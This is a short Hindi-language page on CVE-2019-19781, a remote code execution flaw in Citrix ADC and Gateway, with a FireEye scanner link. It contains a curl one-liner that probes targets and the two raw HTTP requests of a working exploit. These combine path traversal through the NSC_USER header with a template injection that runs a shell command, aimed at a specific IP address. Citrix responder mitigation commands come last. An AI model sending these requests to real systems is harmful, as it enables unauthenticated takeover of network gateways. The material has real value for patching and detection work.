
CVE-2019-19781 - Remote Code Execution on Citrix ADC Netscaler exploit
Citrix Application Delivery Controller और Citrix Gateway में रिमोट कोड एक्ज़ीक्यूशन (RCE)
Citrix Application Delivery Controller (ADC) (पूर्व में NetScaler ADC) और Citrix Gateway (पूर्व में NetScaler Gateway) में एक कमज़ोरी पाई गई है, जिसका फायदा उठाकर कोई अप्रमाणित हमलावर मनमाना कोड निष्पादित कर सकता है।
संपादन: CVE-2019-19781 के लिए Fireeye से संक्रमण संकेतक स्कैनर -> https://github.com/fireeye/ioc-scanner-CVE-2019-19781/
प्रभावित उत्पाद:

TARGET=your_ip
curl -vk –path-as-is https://$TARGET/vpn/../vpns/ 2>&1 | grep “You don’t have permission to access /vpns/” >/dev/null && echo “VULNERABLE: $TARGET” || echo “MITIGATED: $TARGET”
POST /vpn/../vpns/portal/scripts/newbm.pl
POST /vpn/../vpns/portal/scripts/rmbm.pl
GET /vpn/../vpns/portal/scripts/picktheme.pl
इस कमज़ोरी का दोहन करने के लिए बिना किसी प्रमाणीकरण के केवल दो अनुरोधों की आवश्यकता है!
पहला अनुरोध:
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close
Content-Length: 103
url=http://exemple.com&title=[%t=template.new({'BLOCK'='print `uname -a`'})%][% t %]&desc=test&UI_inuse=RfWeb
दूसरा अनुरोध:
GET /vpns/portal/bonclay4.xml HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close

enable ns feature responder
add responder action respondwith403 respondwith "\"HTTP/1.1 403 Forbidden\r\n\r\n\""
add responder policy ctx267027 "HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/vpns/\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/../\"))" respondwith403
bind responder global ctx267027 1 END -type REQ_OVERRIDE
save config